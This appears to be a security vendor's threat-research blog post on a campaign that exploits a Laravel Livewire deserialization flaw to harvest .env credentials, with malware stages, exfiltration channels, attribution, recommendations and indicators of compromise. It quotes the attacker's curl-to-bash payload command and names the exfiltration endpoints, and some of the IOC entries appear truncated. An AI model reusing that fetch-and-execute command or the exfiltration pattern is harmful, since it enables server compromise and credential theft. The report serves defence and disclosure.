CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised

0
8

Introduction

On May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting CVE-2025-54068, a critical unauthenticated RCE vulnerability in Laravel Livewire v3 (versions up to v3.6.3).

The campaign, first documented here, has been running for several months, as evidenced by the large volume of stolen data. Recovery and analysis of the attacker’s exfiltration infrastructure revealed credentials harvested from 6,167 distinct applications spanning dozens of countries and sectors, from e-commerce and healthcare to financial services, education, and government. The attacker’s FTP server contained 1,851+ database dumps and 18+ email lists with over 26 million addresses, indicating the stolen credentials were being actively exploited. Attribution indicators throughout the malware and associated infrastructure point to an Indonesian-origin threat actor.

Attack Vectors and TTPs

Initial Access: CVE-2025-54068 Exploitation

CVE-2025-54068 is a critical vulnerability in Laravel Livewire v3 caused by improper validation of component property updates during the framework’s hydration process. When a Livewire component state is restored from a browser request, Livewire v3 (up to v3.6.3) fails to verify the integrity of the submitted data before deserializing it. An unauthenticated attacker can inject a malicious serialized PHP object into this request, triggering arbitrary code execution on deserialization.

The following HTTP request, reconstructed from our captured attack traffic, illustrates the exploitation:

laravel img1

For full technical details on this vulnerability, please see the disclosure here.

Payload Analysis

The exploitation requests we captured contained serialized PHP objects constructed using PHPGGC gadget chains. These chains abuse legitimate PHP classes already present in Laravel applications to achieve code execution during deserialization. The attacker’s payload executes the following command:

curl -skfsSL hxxps://xantibot[.]pw/database-sell/shoc.enz | tr -d '\r' | bash >/dev/null 2>&1 &

This fetches a shell script from the attacker’s C2 server and pipes it directly into bash, executing it in the background with all output suppressed.

Malware Analysis

The credential stealer deployed in this campaign is a 5,269-byte Bash shell script named shoc.enz (SHA256: 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e). At the time of our analysis, this sample was not present in VirusTotal.

Execution Flow

The malware follows an eight-stage execution process:

  1. Environment Setup: Creates a temporary working directory at /tmp/xxxxx
  2. Process Check: Verifies no existing shoc.sh processes are running to prevent multiple instances
  3. File Discovery: Recursively scans the entire filesystem for .env files using the find command
  4. Credential Extraction: Parses discovered files for DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, and APP_KEY values
  5. Data Collection: Copies matching files to a staging directory with randomized filenames
  6. Compression: Archives collected files using zip or tar.gz
  7. Exfiltration: Uploads archives to three separate C2 channels
  8. Cleanup: Deletes the local staging directory to remove forensic evidence

Exfiltration Infrastructure

The threat actor operates a redundant three-channel exfiltration system:

Channel Endpoint Purpose
Primary FTP @ 47.129.100.149:21 Main credential storage
Secondary api.telegram.org Notifications and small file uploads
Tertiary upload.gofile.io Backup cloud storage

Our investigation confirmed active access to all three channels. The FTP server contained 7 directories of stolen data, including full database dumps such as FULL_DUMP_[REDACTED_IP]>_2026-04-29_0418.sql.gz. The GoFile account showed owner-level access with 11,179 files totalling 309.9 MB.

laravel img2

laravel img3

Attribution Indicators

Multiple indicators point to an Indonesian-origin threat actor: Indonesian-language comments in the malware source code, a timezone reference to Asia/Jakarta, and the Telegram handle @ashtarotz (“黐線佬 Wong Gen Deng”) linked to xantibot[.]pw, a domain that presents publicly as a legitimate anti-bot service while hosting the malware payload. Analysis of the domain, and telegram channel metadata also point to Indonesian origin.

laravel img4

laravel img5

The GoFile exfiltration account was registered to azrilsyahputra1337@gmail[.]com. Cross-referencing this address against public breach data reveals it appears in three separate historical breaches of BreachForums (November 2022, August 2025, and March 2026), placing the operator within underground breach communities over an extended period.

laravel img6

What Was Stolen: Analysis of the Recovered Data

Laravel applications store all sensitive configuration in a single .env file: database credentials, API keys, payment processor secrets, cloud access keys, and encryption keys. This makes the file an exceptionally high-value target. A single .env file can provide everything needed to access the application’s database, impersonate users, process payments, and access cloud infrastructure.

Analysis of the recovered collection revealed credentials from 6,167 distinct applications. Of 21,916 unique files analysed, 29% declared a production environment, though the true proportion is higher as many files labeled local contained live payment keys and real domain URLs.

The breakdown of exposed credentials:

Credential Type Count
Database passwords (real, non-default) 14,566 (66.5%)
Production applications with DB credentials 5,784
Confirmed live Stripe secret keys (sk_live_) 188
Valid AWS IAM credentials (AKIA format) 381
JWT secrets 2,929
Google OAuth client secrets (GOCSPX-) 2,409
Filament admin panel passwords 2,232
SMTP passwords 7,176 (32.7%)

 

The FTP server contained over 1,850 full database dump files, confirming the stolen credentials were actively used to extract database contents.

Targeting

The campaign scanned for vulnerable Laravel installations indiscriminately, with victims spanning online gambling and betting (400+ platforms, predominantly Brazilian and Southeast Asian operators), e-commerce, healthcare, education, logistics, and financial services. Multiple confirmed .gov domains were present in the dataset, showing the scanner made no distinction between commercial and public-sector targets. Recognizable open-source Laravel applications were present in the dataset, including the invoicing platform Invoice Ninja, accounting software Akaunting, event ticketing platform Attendize, photo gallery Lychee, and restaurant management system TastyIgniter. Applications were registered across .com, .ru, .site, .online, .br, .tr, .id, .ke, and dozens of other TLDs. Any organization running unpatched Laravel Livewire v3 was a potential victim.

Conclusion and Recommendations

This campaign illustrates how straightforward credential theft, when combined with a high-impact vulnerability and automated scanning, can scale to thousands of victims in a short window. Recovery of the exfiltration infrastructure revealed credentials from over 6,000 distinct applications, including 188 live Stripe payment keys, 381 valid AWS IAM credentials, and database passwords for nearly 5,800 confirmed production systems. For many victims, the initial server compromise is only the beginning of the exposure.

We recommend the following actions for defenders:

  1. Patch immediately: Update Laravel Livewire to version 3.6.4 or later to remediate CVE-2025-54068. This is the single most effective mitigation.
  2. Block outbound FTP: Production web servers should not require outbound FTP access. Block port 21 egress and alert on any connection attempts to 47.129.100.149.
  3. Monitor for suspicious API access: Alert on connections from web servers to api.telegram.org and upload.gofile.io, which are atypical for production Laravel applications.

If you believe your organization has been compromised, rotate all database credentials and Laravel APP_KEY values immediately, and review database access logs for unauthorized activity.

Indicators of Compromise

IP Addresses

  • 86.88.234 (Attack source)
  • 129.100.149 (FTP C2 server)
  • 63.67.153 (Webhook server)

Domains and URLs

  • pw
  • hxxps://xantibot[.]pw/database-sell/shoc.enz
  • hxxps://webhook[.]site/b156c0b1-3e2f-41b4-a9a3-f492e50a0595

File Hashes (SHA-256)

  • 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e (shoc.enz)

MITRE ATT&CK Mapping

Technique ID Technique Name Campaign Usage
T1190 Exploit Public-Facing Application CVE-2025-54068 exploitation
T1059.004 Unix Shell Bash script execution via piped curl
T1105 Ingress Tool Transfer curl retrieval of shoc.enz payload
T1083 File and Directory Discovery Recursive filesystem scan for .env files
T1552.001 Credentials In Files .env file harvesting
T1560.001 Archive Collected Data: Archive via Utility zip/tar.gz staging archive creation
T1041 Exfiltration Over C2 Channel Telegram Bot API exfiltration
T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol FTP exfiltration to 47.129.100.149
T1567.002 Exfiltration to Cloud Storage GoFile uploads
T1070.004 File Deletion Staging directory cleanup post-exfiltration
T1036 Masquerading Randomized archive and staging folder names

 

Imperva Threat Research continues to monitor this campaign. Imperva customers are fully protected against exploitation of CVE-2025-54068. Customers requiring further guidance on this vulnerability are encouraged to contact Imperva support.

The post CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised appeared first on Blog.

– Read more